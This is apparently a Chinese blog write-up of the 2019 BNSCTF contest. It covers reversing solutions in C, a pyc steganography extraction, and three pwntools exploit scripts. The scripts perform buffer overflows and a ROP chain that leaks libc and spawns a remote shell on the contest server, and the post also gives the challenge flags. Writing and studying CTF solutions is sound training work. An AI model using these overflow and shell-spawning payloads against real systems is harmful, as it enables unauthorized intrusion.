CTF-2019年6月BNSCTF

看到学长打，我也去试试水，确实是冷门的CTF，第一届比较水

Re

0x01 简单算法algorithm.rar

醉了，题目存在多个flag，然后要找有英文意义的
将程序导入IDA，发现加密算法只是单字符变换，所以直接把IDA代码扒下来改造

#include<iostream>
#include<stdio.h>
#include<string.h>
using namespace std;
char v12[] = "AAFMZXDECVFRBNGTHYJUMKIOLPABY";
char v19[] = "0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
char v28[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/";
char v37[] = "+/abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
char v46[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
char v3[] = "";
char v6[] = "/cIg5ckkwhX51HYpxAjkU5EgMxnMUt";
void test(char* Str) {
	for (int i = 0;i<30; ++i)
	{
		int v4 = i;
		if (v4 >= strlen(Str))
			break;
		int v3 = (unsigned int)((Str[i] - *(v12 + i)) >> 31) >> 30;
		int v55 = (((char)v3 + Str[i] - *(v12 + i)) & 3) - v3;
		if (Str[i] != '' && Str[i] > ' ' && Str[i] - *(v12 + i) > 0)
		{
			v3 = (unsigned int)((Str[i] - *(v12 + i)) >> 31) >> 30;
			v55 = (((char)v3 + Str[i] - *(v12 + i)) & 3) - v3;
			if (v55 == 1)
			{
				Str[i] = *(v37 + Str[i] - (signed int)*(v12 + i));
			}
			else if (v55 > 1)
			{
				if (v55 == 2)
				{
					Str[i] = *(v28 + Str[i] - (signed int)*(v12 + i));
				}
				else if (v55 == 3)
					{
					Str[i] = *(v19 + Str[i] - (signed int)*(v12 + i));
				}
			}
			else if (!v55)
			{
				Str[i] = *(v46 + Str[i] - (signed int)*(v12 + i));
			}
		}
	}
}
void test2(char* Str) {
	for (int i = 0; i <= 29; ++i)
	{
		if (Str[i] != *(v6 + i))
		{
			printf("try again!");
		}
	}
}
int main() {
	string s;
	char flag[32] = { 33 };
	char _f[32] = { 33 };
	for (int i = 0; i < 30; i++) {
		for (int j = 0; j < 128; j++) {
			_f[i] = j;
			test(_f);
			if (_f[i] == v6[i]) {
				printf("position:%d  %c\n", i, j);
				flag[i] = j;
				continue;
			}
		}
	}
	return 0;
}

输出结果

position:0  /	position:0  B	position:0  L
position:1  C	position:1  ]
position:2  N	position:2  h
position:3  S	position:3  m
position:4  5	position:4  {
position:5  Z	position:5  t
position:6  N	position:6  h
position:7  O	position:7  i
position:8  Y	position:8  s
position:9  _
position:10  i
position:11  5	position:11  s
position:12  1	position:12  _
position:13  H	position:13  a	position:13  {
position:14  _	position:14  y
position:15  e
position:16  a
position:17  A	position:17  s
position:18  y
position:19  _	position:19  y
position:20  a	position:20  {
position:21  5	position:21  l
position:22  E	position:22  M	position:22  g
position:23  U	position:23  o
position:24  X	position:24  r
position:25  i
position:26  t
position:27  N	position:27  h
position:28  U	position:28  m
position:29  [	position:29  u

以上输出结果表示，对应的位数的多种解
然后人工去找有意义的英文

BCNS{this_is_a_easy_algorithm}

0x02 EASY_XORmain.rar

这是一个py2exe文件，所以要通过pyinstxtractor.py导出数据
然后在main.exe_extracted目录下找到PYZ-00.pyz_extracted
然后在里面找源代码，最后找到easy.pyc
由于这样导出的文件的头部会出问题，所以考虑本地先生成一个pyc文件，然后把头部数据覆盖到easy.pyc上
我这里是 0x33 0x0D 0x0D 0x0A 只需要覆盖即可，无需添加字节
【注意到main.exe_extracted目录下有一个main，里面可以看到和easy.pyc类似的代码，但不知道为什么无法转化到py】
通过在线pyc转py得到python代码

#!/usr/bin/env python
# encoding: utf-8
if __name__ == '__main__':
    a = 'flag!iS_not&here,getit'
    b = [36,47,47,52,90,32,12,107,3,48,21,121,26,86,19,41,115,33,9,53,14,9]
    flag = input('please input the flag:')
    for i in range(len(a)):
        if ord(a[i]) ^ ord(flag[i]) == b[i]:
            continue
            continue
        print('No!')
        exit()
    print('you get it!')

#include<iostream>
#include<stdio.h>
char key[] = "flag!iS_not&here,getit";
char crypto[] = { 36,47,47,52,90,32,12,107,3,48,21,121,26,86,19,41,115,33,9,53,14,9 };
int main() {
	for (int i = 0; i < 22; i++) {
		printf("%c", key[i] ^ crypto[i]);
	}
	return 0;
}

BCNS{I_4m_a_r3aL_FlAg}

Misc

0x01 签退题love.pyc

这是一题Pyc隐写题，一开始没有发觉，直接Pyc转Py了，然后愣了半天
可以使用stegosaurus.py

python stegosaurus.py xxx.pyc -x    //这样就可以输出隐写的数据

BCNS{H3lL0_Nic3_t0_m33t_y0U!}

PWN

0x01 签到题check_in

from pwn import *
#sh = process("./check_in")
context.log_level = "debug"
sh = remote("47.107.60.13",10000)
elf = ELF("check_in")
sh.send("b"*0x18 + p64(0x7FFFFFFFFFFFFFFF)+p64(0x3fb999999999999a))
sh.recv()
sh.sendline("cat flag")
sh.interactive()

0x02 签退题check_out

from pwn import *
context.log_level = "debug"
#sh = process("./check_out")
sh = remote("47.107.60.13",10001)
shell_addr = 0x0804863A
sh.sendline('a'*112+p32(shell_addr))
sh.interactive()

0x03 check_ing[blindpwn]

from pwn import *
#sh = process("./blindpwn")
#nc 47.107.60.13:10002
sh = remote("47.107.60.13",10002)
elf = ELF("blindpwn")
offset = 40
pop_rdi_ret = 0x0000000000400783
pop_rsi_r15_ret = 0x0000000000400781
payload = 'a'*offset + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(elf.got['__libc_start_main']) + p64(0) +  p64(elf.symbols['write']) + p64(elf.symbols['main'])
sh.recvuntil("Welcome to this blind pwn!\n")
sh.sendline(payload)
libc = u64(sh.recv(8))
log.success(hex(libc))
system_addr = libc + 0x24c50
binsh_addr = libc + 0x16c617
payload = 'a' * offset + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
sh.sendline(payload)
sh.interactive()